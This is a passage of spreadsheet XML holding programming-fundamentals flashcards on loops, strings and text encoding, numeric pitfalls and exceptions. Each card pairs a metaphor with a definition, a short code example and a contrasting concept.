          <t>n = 0 / while n != 100: n += 3 # 99 -&gt; 102, skips 100 forever</t>
        </is>
      </c>
      <c r="G49" t="inlineStr">
        <is>
          <t>Event loop - servers run while True on purpose with blocking waits and breaks; the bug is having no reachable exit.</t>
        </is>
      </c>
      <c r="H49" t="inlineStr">
        <is>
          <t>An escalator whose top step feeds the bottom</t>
        </is>
      </c>
      <c r="J49" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K49" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" t="n">
        <v>0</v>
      </c>
      <c r="B50" t="inlineStr">
        <is>
          <t>048</t>
        </is>
      </c>
      <c r="C50" t="inlineStr">
        <is>
          <t>Loop invariant</t>
        </is>
      </c>
      <c r="D50" t="inlineStr">
        <is>
          <t>A tightrope walker crossing loop after loop of rope, her balancing pole engraved 'sum == total of items walked so far': the pole must read true at every step or she falls.</t>
        </is>
      </c>
      <c r="E50" t="inlineStr">
        <is>
          <t>An invariant is a property true before and after every iteration - the handle for reasoning a loop correct, e.g. 'best = max so far'.</t>
        </is>
      </c>
      <c r="F50" t="inlineStr">
        <is>
          <t># invariant: s == sum(a[:i]) / for i in range(len(a)): s += a[i]</t>
        </is>
      </c>
      <c r="G50" t="inlineStr">
        <is>
          <t>Postcondition - the postcondition holds once at the end; the invariant holds at every iteration boundary.</t>
        </is>
      </c>
      <c r="H50" t="inlineStr">
        <is>
          <t>A pilot's checklist re-verified between every leg</t>
        </is>
      </c>
      <c r="J50" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K50" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" t="n">
        <v>0</v>
      </c>
      <c r="B51" t="inlineStr">
        <is>
          <t>049</t>
        </is>
      </c>
      <c r="C51" t="inlineStr">
        <is>
          <t>Mutating while iterating</t>
        </is>
      </c>
      <c r="D51" t="inlineStr">
        <is>
          <t>Sawing rungs off a ladder while climbing it: cut the rung underfoot and your boot lands two rungs up, skipping one - or the whole ladder bucks you off (RuntimeError).</t>
        </is>
      </c>
      <c r="E51" t="inlineStr">
        <is>
          <t>Modifying a collection during iteration over it skips or repeats elements, or raises (dict); iterate a copy or build a new one.</t>
        </is>
      </c>
      <c r="F51" t="inlineStr">
        <is>
          <t>for x in lst: lst.remove(x) # silently skips items / for x in lst[:]: ... # safe copy</t>
        </is>
      </c>
      <c r="G51" t="inlineStr">
        <is>
          <t>Iterating a snapshot - for k in list(d) is safe; mutating d while iterating d itself raises RuntimeError.</t>
        </is>
      </c>
      <c r="H51" t="inlineStr">
        <is>
          <t>Eating the buffet table while walking down it</t>
        </is>
      </c>
      <c r="J51" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K51" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" t="n">
        <v>0</v>
      </c>
      <c r="B52" t="inlineStr">
        <is>
          <t>050</t>
        </is>
      </c>
      <c r="C52" t="inlineStr">
        <is>
          <t>String as sequence</t>
        </is>
      </c>
      <c r="D52" t="inlineStr">
        <is>
          <t>A charm bracelet with numbered links starting at 0: you can lift out charm 4 alone, or unclip a whole run of links (a slice) without breaking the chain.</t>
        </is>
      </c>
      <c r="E52" t="inlineStr">
        <is>
          <t>A string is an ordered, indexable sequence of characters: s[0], slices s[1:3], len(s), and iteration treat text like a list of chars.</t>
        </is>
      </c>
      <c r="F52" t="inlineStr">
        <is>
          <t>s = "hello" / s[0] -&gt; "h"; s[1:3] -&gt; "el"; len(s) -&gt; 5</t>
        </is>
      </c>
      <c r="G52" t="inlineStr">
        <is>
          <t>List - both are sequences, but strings are immutable and hold only characters.</t>
        </is>
      </c>
      <c r="H52" t="inlineStr">
        <is>
          <t>Train cars numbered from the locomotive</t>
        </is>
      </c>
      <c r="J52" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K52" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" t="n">
        <v>0</v>
      </c>
      <c r="B53" t="inlineStr">
        <is>
          <t>051</t>
        </is>
      </c>
      <c r="C53" t="inlineStr">
        <is>
          <t>String immutability</t>
        </is>
      </c>
      <c r="D53" t="inlineStr">
        <is>
          <t>Words glazed and fired in a kiln: to fix a typo you cannot repaint the pot - you throw an entirely new pot with the corrected word, and the flawed original stays on the shelf.</t>
        </is>
      </c>
      <c r="E53" t="inlineStr">
        <is>
          <t>Strings cannot change in place - every 'modification' (upper, replace, +) builds and returns a brand-new string object.</t>
        </is>
      </c>
      <c r="F53" t="inlineStr">
        <is>
          <t>s = "cat" / s[0] = "b" # TypeError / s = "b" + s[1:] # new string</t>
        </is>
      </c>
      <c r="G53" t="inlineStr">
        <is>
          <t>Rebinding - s = s.upper() points the name at a new string; the original object never changed.</t>
        </is>
      </c>
      <c r="H53" t="inlineStr">
        <is>
          <t>A tattoo you can only cover with a new tattoo</t>
        </is>
      </c>
      <c r="J53" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K53" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" t="n">
        <v>0</v>
      </c>
      <c r="B54" t="inlineStr">
        <is>
          <t>052</t>
        </is>
      </c>
      <c r="C54" t="inlineStr">
        <is>
          <t>Concatenation cost</t>
        </is>
      </c>
      <c r="D54" t="inlineStr">
        <is>
          <t>A monk who recopies the entire scroll by hand every time he adds one line at the bottom; the wise monk drops lines into a basket all day and glues them once at dusk (join).</t>
        </is>
      </c>
      <c r="E54" t="inlineStr">
        <is>
          <t>Repeated s += part copies the whole string each time - O(n^2) total; collect pieces in a list and "".join(parts) for O(n).</t>
        </is>
      </c>
      <c r="F54" t="inlineStr">
        <is>
          <t>for w in words: s += w # O(n^2) / s = "".join(words) # O(n)</t>
        </is>
      </c>
      <c r="G54" t="inlineStr">
        <is>
          <t>List append - appending to a list is amortized O(1); += on a string recopies the whole prefix every time.</t>
        </is>
      </c>
      <c r="H54" t="inlineStr">
        <is>
          <t>Rebuilding a brick wall to add each new brick</t>
        </is>
      </c>
      <c r="J54" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K54" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" t="n">
        <v>0</v>
      </c>
      <c r="B55" t="inlineStr">
        <is>
          <t>053</t>
        </is>
      </c>
      <c r="C55" t="inlineStr">
        <is>
          <t>String formatting</t>
        </is>
      </c>
      <c r="D55" t="inlineStr">
        <is>
          <t>A Mad Libs pamphlet with windows cut out: you slide value cards into the {brace} holes, and each window's little stencil (:.2f) trims the card to size before it shows.</t>
        </is>
      </c>
      <c r="E55" t="inlineStr">
        <is>
          <t>Formatting interpolates values into templates - f"{name}: {x:.2f}" - with specs controlling width, precision, and padding.</t>
        </is>
      </c>
      <c r="F55" t="inlineStr">
        <is>
          <t>f"{price:.2f}"; "{:&gt;8}".format(x); "%d items" % n</t>
        </is>
      </c>
      <c r="G55" t="inlineStr">
        <is>
          <t>Concatenation - str(a) + ": " + str(b) works, but f-strings handle conversion plus format specs inline.</t>
        </is>
      </c>
      <c r="H55" t="inlineStr">
        <is>
          <t>A rubber stamp with adjustable digit wheels</t>
        </is>
      </c>
      <c r="J55" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K55" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" t="n">
        <v>0</v>
      </c>
      <c r="B56" t="inlineStr">
        <is>
          <t>054</t>
        </is>
      </c>
      <c r="C56" t="inlineStr">
        <is>
          <t>Escape sequences</t>
        </is>
      </c>
      <c r="D56" t="inlineStr">
        <is>
          <t>The backslash is a stage magician's cape: throw it over the letter n and the letter transforms into an actual line break; throw it over a quote and the quote becomes a harmless prop.</t>
        </is>
      </c>
      <c r="E56" t="inlineStr">
        <is>
          <t>A backslash gives the next character special meaning - \n newline, \t tab, \" quote, \\ backslash; raw strings r"..." turn it off.</t>
        </is>
      </c>
      <c r="F56" t="inlineStr">
        <is>
          <t>print("a\tb\n\"hi\"") / path = r"C:\new" # raw: no \n surprise</t>
        </is>
      </c>
      <c r="G56" t="inlineStr">
        <is>
          <t>Raw string - r"\n" is two characters (backslash, n); "\n" is one newline character.</t>
        </is>
      </c>
      <c r="H56" t="inlineStr">
        <is>
          <t>A secret handshake that changes the next word's meaning</t>
        </is>
      </c>
      <c r="J56" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K56" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" t="n">
        <v>0</v>
      </c>
      <c r="B57" t="inlineStr">
        <is>
          <t>055</t>
        </is>
      </c>
      <c r="C57" t="inlineStr">
        <is>
          <t>Unicode code points</t>
        </is>
      </c>
      <c r="D57" t="inlineStr">
        <is>
          <t>A cosmic library where every glyph humanity ever wrote sits in a numbered pigeonhole: 'A' in box 65, and the snowman melting quietly in box U+2603.</t>
        </is>
      </c>
      <c r="E57" t="inlineStr">
        <is>
          <t>Unicode assigns every character a number (code point, U+0000-U+10FFFF); a Python 3 str is a sequence of code points, not bytes.</t>
        </is>
      </c>
      <c r="F57" t="inlineStr">
        <is>
          <t>ord("e") -&gt; 101; chr(0x2603) -&gt; snowman character</t>
        </is>
      </c>
      <c r="G57" t="inlineStr">
        <is>
          <t>Encoding - a code point is the abstract number; an encoding like UTF-8 decides which bytes represent it.</t>
        </is>
      </c>
      <c r="H57" t="inlineStr">
        <is>
          <t>A periodic table for every alphabet at once</t>
        </is>
      </c>
      <c r="J57" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K57" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" t="n">
        <v>0</v>
      </c>
      <c r="B58" t="inlineStr">
        <is>
          <t>056</t>
        </is>
      </c>
      <c r="C58" t="inlineStr">
        <is>
          <t>UTF-8</t>
        </is>
      </c>
      <c r="D58" t="inlineStr">
        <is>
          <t>A telescoping travel cup: plain ASCII letters fold flat into one byte, while the snowman unfolds to three segments - and each segment's stripes announce whether it starts or continues a character.</t>
        </is>
      </c>
      <c r="E58" t="inlineStr">
        <is>
          <t>UTF-8 encodes code points as 1-4 bytes; ASCII stays 1 byte unchanged, and byte prefixes self-synchronize - the web's default encoding.</t>
        </is>
      </c>
      <c r="F58" t="inlineStr">
        <is>
          <t>"\u00e9".encode("utf-8") -&gt; b'\xc3\xa9' # 2 bytes, 1 char</t>
        </is>
      </c>
      <c r="G58" t="inlineStr">
        <is>
          <t>UTF-16 - UTF-16 uses 2- or 4-byte units with surrogates and BOM issues; UTF-8 is byte-oriented and ASCII-safe.</t>
        </is>
      </c>
      <c r="H58" t="inlineStr">
        <is>
          <t>Envelopes that grow stamps as the destination gets exotic</t>
        </is>
      </c>
      <c r="J58" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K58" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" t="n">
        <v>0</v>
      </c>
      <c r="B59" t="inlineStr">
        <is>
          <t>057</t>
        </is>
      </c>
      <c r="C59" t="inlineStr">
        <is>
          <t>Text vs bytes</t>
        </is>
      </c>
      <c r="D59" t="inlineStr">
        <is>
          <t>A border checkpoint between meaning-land and wire-land: prose must pass the encode booth to become numbered freight, and freight must pass decode to become prose. No cargo walks through untranslated.</t>
        </is>
      </c>
      <c r="E59" t="inlineStr">
        <is>
          <t>str is decoded text (code points); bytes are raw octets; convert only at the edges with .encode()/.decode() - never mix the two.</t>
        </is>
      </c>
      <c r="F59" t="inlineStr">
        <is>
          <t>b = "caf\u00e9".encode("utf-8") / s = b.decode("utf-8")</t>
        </is>
      </c>
      <c r="G59" t="inlineStr">
        <is>
          <t>Python 2 str - Py2 blurred bytes and text, corrupting silently; Py3 makes every crossing explicit or an error.</t>
        </is>
      </c>
      <c r="H59" t="inlineStr">
        <is>
          <t>Sheet music vs the pressed vinyl groove</t>
        </is>
      </c>
      <c r="J59" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K59" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" t="n">
        <v>0</v>
      </c>
      <c r="B60" t="inlineStr">
        <is>
          <t>058</t>
        </is>
      </c>
      <c r="C60" t="inlineStr">
        <is>
          <t>Mojibake</t>
        </is>
      </c>
      <c r="D60" t="inlineStr">
        <is>
          <t>A karaoke machine playing the right vinyl at the wrong RPM: the recording is perfectly intact, but out comes chipmunk gibberish - 'A-tilde-copyright' warbling where an accented e should sing.</t>
        </is>
      </c>
      <c r="E60" t="inlineStr">
        <is>
          <t>Mojibake is garbled text from decoding bytes with the wrong encoding - the bytes survived intact; only the interpretation broke.</t>
        </is>
      </c>
      <c r="F60" t="inlineStr">
        <is>
          <t>"caf\u00e9".encode("utf-8").decode("latin-1") / # -&gt; 'caf\u00c3\u00a9' (two junk chars)</t>
        </is>
      </c>
      <c r="G60" t="inlineStr">
        <is>
          <t>Data corruption - mojibake bytes are intact and recoverable by re-decoding correctly; corruption loses the bytes themselves.</t>
        </is>
      </c>
      <c r="H60" t="inlineStr">
        <is>
          <t>Reading a French letter with a Spanish phrasebook</t>
        </is>
      </c>
      <c r="J60" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K60" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" t="n">
        <v>0</v>
      </c>
      <c r="B61" t="inlineStr">
        <is>
          <t>059</t>
        </is>
      </c>
      <c r="C61" t="inlineStr">
        <is>
          <t>Graphemes vs code points</t>
        </is>
      </c>
      <c r="D61" t="inlineStr">
        <is>
          <t>A family-emoji photo on the beach: it looks like one figure, but scissors (slicing) reveal several people zipped together with invisible joiner threads - cut anywhere and you orphan a child glyph.</t>
        </is>
      </c>
      <c r="E61" t="inlineStr">
        <is>
          <t>len counts code points, not what users see: emoji and accent sequences span several code points, so slicing can cut a 'letter' in half.</t>
        </is>
      </c>
      <c r="F61" t="inlineStr">
        <is>
          <t>len("\U0001F468\u200D\U0001F469\u200D\U0001F467") -&gt; 5 / # one on-screen family emoji</t>
        </is>
      </c>
      <c r="G61" t="inlineStr">
        <is>
          <t>Code point count - a grapheme cluster is what a user calls one character; it may span many code points.</t>
        </is>
      </c>
      <c r="H61" t="inlineStr">
        <is>
          <t>A quilt square sewn from many hidden patches</t>
        </is>
      </c>
      <c r="J61" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K61" t="inlineStr">
        <is>
          <t>Strings &amp; text encoding</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" t="n">
        <v>0</v>
      </c>
      <c r="B62" t="inlineStr">
        <is>
          <t>060</t>
        </is>
      </c>
      <c r="C62" t="inlineStr">
        <is>
          <t>Two's complement integers</t>
        </is>
      </c>
      <c r="D62" t="inlineStr">
        <is>
          <t>An abacus with exactly 32 rods, the leftmost rod painted blood-red: it counts debt (the sign) instead of beads, which is why the machine reaches one deeper below zero than above.</t>
        </is>
      </c>
      <c r="E62" t="inlineStr">
        <is>
          <t>Fixed-width ints store binary two's complement: n bits span -2^(n-1) to 2^(n-1)-1, and negation is flip-all-bits-plus-one.</t>
        </is>
      </c>
      <c r="F62" t="inlineStr">
        <is>
          <t>8-bit range: -128..127; -1 is stored as 0b11111111</t>
        </is>
      </c>
      <c r="G62" t="inlineStr">
        <is>
          <t>Unsigned int - unsigned reuses the sign bit for magnitude, doubling the max but banning negatives.</t>
        </is>
      </c>
      <c r="H62" t="inlineStr">
        <is>
          <t>A thermometer whose top stripe flips the scale negative</t>
        </is>
      </c>
      <c r="J62" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K62" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" t="n">
        <v>0</v>
      </c>
      <c r="B63" t="inlineStr">
        <is>
          <t>061</t>
        </is>
      </c>
      <c r="C63" t="inlineStr">
        <is>
          <t>Integer overflow</t>
        </is>
      </c>
      <c r="D63" t="inlineStr">
        <is>
          <t>A getaway car's odometer maxed at 99999 rolls silently over to 00000 mid-chase - and the signed model rolls to minus-100000, the speedometer suddenly reading backwards.</t>
        </is>
      </c>
      <c r="E63" t="inlineStr">
        <is>
          <t>When a result exceeds a fixed-width int's range it silently wraps in C/Java (INT_MAX + 1 -&gt; INT_MIN); Python ints just grow.</t>
        </is>
      </c>
      <c r="F63" t="inlineStr">
        <is>
          <t>Java: Integer.MAX_VALUE + 1 -&gt; -2147483648 / Python: ints never overflow</t>
        </is>
      </c>
      <c r="G63" t="inlineStr">
        <is>
          <t>Float overflow - floats overflow loudly to inf; fixed ints wrap around silently.</t>
        </is>
      </c>
      <c r="H63" t="inlineStr">
        <is>
          <t>Pac-Man exiting the right edge and reappearing on the left</t>
        </is>
      </c>
      <c r="J63" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K63" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" t="n">
        <v>0</v>
      </c>
      <c r="B64" t="inlineStr">
        <is>
          <t>062</t>
        </is>
      </c>
      <c r="C64" t="inlineStr">
        <is>
          <t>IEEE 754 format</t>
        </is>
      </c>
      <c r="D64" t="inlineStr">
        <is>
          <t>A scientific stagecoach with three compartments: a flag seat (sign), a magnitude engine (exponent) sliding the coach across scales, and 52 luggage slots (mantissa) - bring more digits and the porter rounds your luggage away.</t>
        </is>
      </c>
      <c r="E64" t="inlineStr">
        <is>
          <t>IEEE 754 doubles pack 1 sign bit, 11 exponent bits, 52 mantissa bits; special patterns encode +-inf, NaN, and signed zero.</t>
        </is>
      </c>
      <c r="F64" t="inlineStr">
        <is>
          <t>import struct / struct.pack("&gt;d", 1.5).hex() -&gt; '3ff8000000000000'</t>
        </is>
      </c>
      <c r="G64" t="inlineStr">
        <is>
          <t>Decimal floating point - binary IEEE 754 cannot store 0.1 exactly; decimal formats and Decimal can.</t>
        </is>
      </c>
      <c r="H64" t="inlineStr">
        <is>
          <t>A slide rule with a sign flag and 52 tick marks</t>
        </is>
      </c>
      <c r="J64" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K64" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" t="n">
        <v>0</v>
      </c>
      <c r="B65" t="inlineStr">
        <is>
          <t>063</t>
        </is>
      </c>
      <c r="C65" t="inlineStr">
        <is>
          <t>0.1 + 0.2 problem</t>
        </is>
      </c>
      <c r="D65" t="inlineStr">
        <is>
          <t>Two measuring cups labeled 0.1 and 0.2, each secretly overfilled by a molecule at the factory (binary rounding): pour them together and the beaker needle trembles at 0.30000000000000004.</t>
        </is>
      </c>
      <c r="E65" t="inlineStr">
        <is>
          <t>0.1 + 0.2 == 0.30000000000000004 because 0.1 and 0.2 have no finite binary expansion - like 1/3 in decimal, rounded at parse time.</t>
        </is>
      </c>
      <c r="F65" t="inlineStr">
        <is>
          <t>0.1 + 0.2 -&gt; 0.30000000000000004 / 0.1 + 0.2 == 0.3 -&gt; False</t>
        </is>
      </c>
      <c r="G65" t="inlineStr">
        <is>
          <t>Precision loss during math - the addition is fine; the inputs themselves were never exactly 0.1 and 0.2.</t>
        </is>
      </c>
      <c r="H65" t="inlineStr">
        <is>
          <t>Copying one-third onto paper that only holds ten digits</t>
        </is>
      </c>
      <c r="J65" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K65" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" t="n">
        <v>0</v>
      </c>
      <c r="B66" t="inlineStr">
        <is>
          <t>064</t>
        </is>
      </c>
      <c r="C66" t="inlineStr">
        <is>
          <t>Epsilon comparison</t>
        </is>
      </c>
      <c r="D66" t="inlineStr">
        <is>
          <t>A carpenter checks two beams with a feeler gauge instead of demanding atom-perfect flushness: gap thinner than the epsilon leaf means 'equal' - and he picks a thicker leaf for longer beams (relative tolerance).</t>
        </is>
      </c>
      <c r="E66" t="inlineStr">
        <is>
          <t>Never == floats: compare within tolerance, abs(a-b) &lt;= max(rel*max(|a|,|b|), abs_tol), as math.isclose does.</t>
        </is>
      </c>
      <c r="F66" t="inlineStr">
        <is>
          <t>math.isclose(0.1 + 0.2, 0.3) -&gt; True</t>
        </is>
      </c>
      <c r="G66" t="inlineStr">
        <is>
          <t>Fixed absolute epsilon - one absolute epsilon fails at huge or tiny magnitudes; combine with relative tolerance.</t>
        </is>
      </c>
      <c r="H66" t="inlineStr">
        <is>
          <t>Horseshoes scoring: close enough counts</t>
        </is>
      </c>
      <c r="J66" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K66" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" t="n">
        <v>0</v>
      </c>
      <c r="B67" t="inlineStr">
        <is>
          <t>065</t>
        </is>
      </c>
      <c r="C67" t="inlineStr">
        <is>
          <t>Integer vs float division</t>
        </is>
      </c>
      <c r="D67" t="inlineStr">
        <is>
          <t>A pizza cutter with two blades: the smooth wheel (/) slices fair fractional slivers; the guillotine blade (//) chops whole slices and sweeps the crumbs off the table, flooring toward minus infinity.</t>
        </is>
      </c>
      <c r="E67" t="inlineStr">
        <is>
          <t>Python / is always float and // floors; C's int / truncates toward zero - forgetting which yields surprise 0s or 3-instead-of-3.5.</t>
        </is>
      </c>
      <c r="F67" t="inlineStr">
        <is>
          <t>7 / 2 -&gt; 3.5; 7 // 2 -&gt; 3; -7 // 2 -&gt; -4 / C: 7 / 2 -&gt; 3</t>
        </is>
      </c>
      <c r="G67" t="inlineStr">
        <is>
          <t>Truncation vs floor - C truncates toward zero (-7/2 == -3); Python floors (-7//2 == -4).</t>
        </is>
      </c>
      <c r="H67" t="inlineStr">
        <is>
          <t>A cash register that refuses to make change</t>
        </is>
      </c>
      <c r="J67" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K67" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" t="n">
        <v>0</v>
      </c>
      <c r="B68" t="inlineStr">
        <is>
          <t>066</t>
        </is>
      </c>
      <c r="C68" t="inlineStr">
        <is>
          <t>Modulo with negatives</t>
        </is>
      </c>
      <c r="D68" t="inlineStr">
        <is>
          <t>Two carousel operators counting your backward laps: the Python operator always reports which painted horse (0, 1, 2) you stopped on - never negative; the C operator reports your overshoot, minus sign and all.</t>
        </is>
      </c>
      <c r="E68" t="inlineStr">
        <is>
          <t>Languages disagree on -7 % 3: Python gives 2 (sign of divisor, floored division); C/Java/JS give -1 (sign of dividend, truncated).</t>
        </is>
      </c>
      <c r="F68" t="inlineStr">
        <is>
          <t>Python: -7 % 3 -&gt; 2 / C/Java/JS: -7 % 3 -&gt; -1</t>
        </is>
      </c>
      <c r="G68" t="inlineStr">
        <is>
          <t>Remainder vs modulo - truncated division yields a remainder with the dividend's sign; floored yields the divisor's sign.</t>
        </is>
      </c>
      <c r="H68" t="inlineStr">
        <is>
          <t>A clock that never shows negative hours vs one that does</t>
        </is>
      </c>
      <c r="J68" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K68" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" t="n">
        <v>0</v>
      </c>
      <c r="B69" t="inlineStr">
        <is>
          <t>067</t>
        </is>
      </c>
      <c r="C69" t="inlineStr">
        <is>
          <t>NaN</t>
        </is>
      </c>
      <c r="D69" t="inlineStr">
        <is>
          <t>A masked ghost in a hall of mirrors that casts no reflection: hold NaN up to any mirror - even its own - and equality shows nothing (NaN != NaN); shake its hand and you turn ghost too (propagation).</t>
        </is>
      </c>
      <c r="E69" t="inlineStr">
        <is>
          <t>NaN ('not a number') results from invalid float ops (0/0, inf - inf), poisons all arithmetic, and is unequal to everything - even itself.</t>
        </is>
      </c>
      <c r="F69" t="inlineStr">
        <is>
          <t>float("nan") != float("nan") -&gt; True / math.isnan(x) # the only honest test</t>
        </is>
      </c>
      <c r="G69" t="inlineStr">
        <is>
          <t>None/null - None means 'no value' and equals itself; NaN is a real float value that never equals anything.</t>
        </is>
      </c>
      <c r="H69" t="inlineStr">
        <is>
          <t>A counterfeit bill that fails every checker including its twin</t>
        </is>
      </c>
      <c r="J69" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K69" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" t="n">
        <v>0</v>
      </c>
      <c r="B70" t="inlineStr">
        <is>
          <t>068</t>
        </is>
      </c>
      <c r="C70" t="inlineStr">
        <is>
          <t>Decimal &amp; exact types</t>
        </is>
      </c>
      <c r="D70" t="inlineStr">
        <is>
          <t>A bank teller's brass balance that weighs coins in powers of ten: every cent has its own labeled drawer, and the teller must sign a rounding policy before any drawer may be split.</t>
        </is>
      </c>
      <c r="E70" t="inlineStr">
        <is>
          <t>Decimal/BigDecimal store base-10 digits exactly with explicit rounding rules - mandatory for money; Fraction keeps exact ratios.</t>
        </is>
      </c>
      <c r="F70" t="inlineStr">
        <is>
          <t>from decimal import Decimal / Decimal("0.1") * 3 -&gt; Decimal("0.3")</t>
        </is>
      </c>
      <c r="G70" t="inlineStr">
        <is>
          <t>Decimal(0.1) - constructing from the float smuggles in the binary error; always build from a string, Decimal("0.1").</t>
        </is>
      </c>
      <c r="H70" t="inlineStr">
        <is>
          <t>An apothecary measuring in exact base-ten vials</t>
        </is>
      </c>
      <c r="J70" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K70" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" t="n">
        <v>0</v>
      </c>
      <c r="B71" t="inlineStr">
        <is>
          <t>069</t>
        </is>
      </c>
      <c r="C71" t="inlineStr">
        <is>
          <t>Float integer limit (2^53)</t>
        </is>
      </c>
      <c r="D71" t="inlineStr">
        <is>
          <t>A hotel with 2^53 rooms: past the top floor, keys only come in even numbers - guest ...993 is silently checked into room ...992, and the JavaScript front desk never mentions it.</t>
        </is>
      </c>
      <c r="E71" t="inlineStr">
        <is>
          <t>Doubles represent integers exactly only up to 2^53; beyond that whole numbers round - JS's single Number type corrupts big IDs silently.</t>
        </is>
      </c>
      <c r="F71" t="inlineStr">
        <is>
          <t>JS: 9007199254740992 + 1 -&gt; 9007199254740992 / Python ints stay exact at any size</t>
        </is>
      </c>
      <c r="G71" t="inlineStr">
        <is>
          <t>Integer overflow - overflow wraps fixed-width ints; here the float format skips odd integers past 2^53 without wrapping.</t>
        </is>
      </c>
      <c r="H71" t="inlineStr">
        <is>
          <t>A ruler whose millimeter marks vanish past a kilometer</t>
        </is>
      </c>
      <c r="J71" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K71" t="inlineStr">
        <is>
          <t>Numbers &amp; arithmetic pitfalls</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" t="n">
        <v>0</v>
      </c>
      <c r="B72" t="inlineStr">
        <is>
          <t>070</t>
        </is>
      </c>
      <c r="C72" t="inlineStr">
        <is>
          <t>Exception (throw/raise)</t>
        </is>
      </c>
      <c r="D72" t="inlineStr">
        <is>
          <t>A line worker yanks the red andon cord and hurls the defective part straight up through every floor of the factory; work halts on each floor it passes until someone's catcher's mitt snags it.</t>
        </is>
      </c>
      <c r="E72" t="inlineStr">
        <is>
          <t>An exception is an object thrown when an operation cannot proceed; it aborts normal flow and unwinds the stack until caught.</t>
        </is>
      </c>
      <c r="F72" t="inlineStr">
        <is>
          <t>raise ValueError("bad input")</t>
        </is>
      </c>
      <c r="G72" t="inlineStr">
        <is>
          <t>Error code - a returned code waits politely to be checked (and gets ignored); an exception forcibly interrupts flow.</t>
        </is>
      </c>
      <c r="H72" t="inlineStr">
        <is>
          <t>A flare gun fired up through the decks of a ship</t>
        </is>
      </c>
      <c r="J72" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K72" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" t="n">
        <v>0</v>
      </c>
      <c r="B73" t="inlineStr">
        <is>
          <t>071</t>
        </is>
      </c>
      <c r="C73" t="inlineStr">
        <is>
          <t>try/catch (except)</t>
